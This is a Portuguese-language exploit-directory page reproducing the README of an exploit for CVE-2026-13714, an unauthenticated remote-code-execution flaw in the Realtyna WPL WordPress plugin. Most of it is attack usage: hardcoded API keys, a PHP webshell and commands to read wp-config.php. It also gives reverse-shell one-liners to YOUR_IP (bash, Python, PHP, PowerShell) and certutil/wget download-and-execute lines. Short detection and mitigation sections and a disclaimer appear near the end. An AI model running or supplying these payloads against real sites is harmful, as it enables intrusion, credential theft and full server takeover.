Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-13714 — Exploit de RCE não autenticado para Realtyna WPL < 5.3.0 que faz upload de um webshell PHP via chave de API embutida e executa comandos arbitrários do sistema. | Kitploit
Ferramentas/GitHubGitHub/katransefa/cve-2026-13714
ExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoDesenvolvimento de Payloads
GitHubkatransefa/cve-2026-13714

CVE-2026-13714

Exploit de RCE não autenticado para Realtyna WPL < 5.3.0 que faz upload de um webshell PHP via chave de API embutida e executa comandos arbitrários do sistema.

Ver Repositório
há 4 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Realtyna WPL < 5.3.0 - Exploit de RCE Não Autenticado

Descrição

Este exploit tem como alvo uma vulnerabilidade crítica nas versões anteriores a 5.3.0 do plugin Realtyna Organic IDX + WPL Real Estate. O plugin utiliza credenciais hardcoded e permite upload de arquivos não autenticado, levando à Execução Remota de Código (RCE).

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2026-13714
  • Versões Afetadas: < 5.3.0
  • Tipo: Upload Arbitrário de Arquivos Não Autenticado para RCE
  • Pesquisador: Thom Stackhouse

Detalhes Técnicos

O plugin possui uma API de I/O habilitada por padrão com credenciais hardcoded:

  • io_public_key = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
  • io_private_key = Eft76bdh0o2uyhJkbG3T

A API não valida os tipos de arquivo, permitindo uploads arbitrários de arquivos PHP.

Instalação

root@kitploit:~
# Clone or download the script
git clone https://github.com/yourusername/wpl-rce-exploit.git
cd wpl-rce-exploit

# Install dependencies
pip install requests urllib3

Uso

Uso Básico

root@kitploit:~
# Upload webshell only
python exploit.py -u https://target.com/wordpress

# Execute a command
python exploit.py -u https://target.com/wordpress -c "whoami"

# Multiple commands
python exploit.py -u https://target.com/wordpress -c "id"  # Linux
python exploit.py -u https://target.com/wordpress -c "systeminfo"  # Windows

Comandos Comuns

Alvos Linux

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "uname -a"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "ls -la"

# Read wp-config.php
python exploit.py -u https://target.com -c "cat wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ifconfig"
python exploit.py -u https://target.com -c "netstat -tulpn"

Alvos Windows

root@kitploit:~
# System information
python exploit.py -u https://target.com -c "systeminfo"

# Current user
python exploit.py -u https://target.com -c "whoami"

# List files
python exploit.py -u https://target.com -c "dir"

# Read wp-config.php
python exploit.py -u https://target.com -c "type wp-config.php"

# Network information
python exploit.py -u https://target.com -c "ipconfig"
python exploit.py -u https://target.com -c "netstat -ano"

Uso Avançado

Reverse Shell (Linux)

root@kitploit:~
# Netcat reverse shell
python exploit.py -u https://target.com -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

# Python reverse shell
python exploit.py -u https://target.com -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

# PHP reverse shell
python exploit.py -u https://target.com -c "php -r '\$sock=fsockopen(\"YOUR_IP\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"

Reverse Shell (Windows)

root@kitploit:~
# PowerShell reverse shell
python exploit.py -u https://target.com -c "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

Upload e Execução de Payloads Personalizados

root@kitploit:~
# Download and execute (Windows)
python exploit.py -u https://target.com -c "certutil -urlcache -f http://YOUR_IP/payload.exe C:\temp\payload.exe && C:\temp\payload.exe"

# Download and execute (Linux)
python exploit.py -u https://target.com -c "wget http://YOUR_IP/payload -O /tmp/payload && chmod +x /tmp/payload && /tmp/payload"

Fluxo do Exploit

  1. Upload: Envia um webshell PHP (<?php system($_GET['c']); ?>)
  2. Localização: Arquivo salvo em wp-content/uploads/WPL/<ID>/shell.php
  3. Execução: Executa comandos via shell.php?c=COMMAND

Detecção

Como Detectar o Exploit

  • Verifique se há arquivos suspeitos em /wp-content/uploads/WPL/*/
  • Monitore requisições com os parâmetros: wplview=io, wplformat=io, cmd=set_property
  • Procure por requisições suspeitas à API com credenciais hardcoded

Sinais de Comprometimento

  • Arquivos PHP inesperados em diretórios de upload
  • Requisições web incomuns com comandos do sistema
  • Novos usuários administradores no WordPress
  • Arquivos .htaccess modificados

Mitigação

Correções

  1. Atualize imediatamente para a versão 5.3.0 ou superior do WPL Real Estate
  2. Se não for possível atualizar, desabilite a API de I/O:
    root@kitploit:~
    // Add to wp-config.php
    define('WPL_IO_STATUS', 0);
    
  3. Altere as credenciais hardcoded
  4. Implemente validação adequada de tipos de arquivo
  5. Restrinja os diretórios de upload de arquivos

Recomendações de Segurança

  • Mantenha todos os plugins do WordPress atualizados
  • Utilize um Firewall de Aplicação Web (WAF)
  • Realize auditorias de segurança regularmente
  • Monitore os diretórios de upload de arquivos
  • Desabilite APIs desnecessárias

Capturas de Tela

Exploit Bem-sucedido

root@kitploit:~
[+] Realtyna WPL < 5.3.0 RCE Exploit
[+] Target: https://localhost/wordpress/
[+] Command: whoami
[+] Uploading webshell...
[+] File uploaded successfully!
[+] Webshell found at: wp-content/uploads/WPL/1/shell.php
[+] Command output:
desktop-0s8mt1v\kg

Aviso Legal

Este exploit é destinado exclusivamente a fins educacionais e testes autorizados. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão de teste é ilegal. O autor não se responsabiliza pelo uso indevido.

Uso Legal

  • Utilize apenas em sistemas que você possui
  • Utilize apenas com permissão explícita por escrito
  • Siga as práticas de divulgação responsável
  • Reporte vulnerabilidades aos fornecedores

Licença

Este projeto é apenas para fins educacionais. Use por sua conta e risco.

Créditos

  • Pesquisador Original: Thom Stackhouse
  • CVE: CVE-2026-13714
  • ID WPVDB: 69f9dcd8-ab3c-46ed-ac6b-2f1db35f8d1f

Referências

  • Página de Vulnerabilidade do WPScan
  • CVE-2026-13714

Changelog

v1.0 (2026-08-17)

  • Lançamento inicial
  • Upload de arquivos não autenticado
  • Execução remota de código
  • Suporte à execução de comandos

Contribuição

Sinta-se à vontade para enviar issues e pull requests para melhorias.

Suporte

Para problemas e dúvidas, abra uma issue no GitHub.


⚠️ AVISO: Esta ferramenta é fornecida apenas para pesquisa de segurança e fins educacionais. Sempre obtenha autorização adequada antes de testar qualquer sistema.

Baixar ferramenta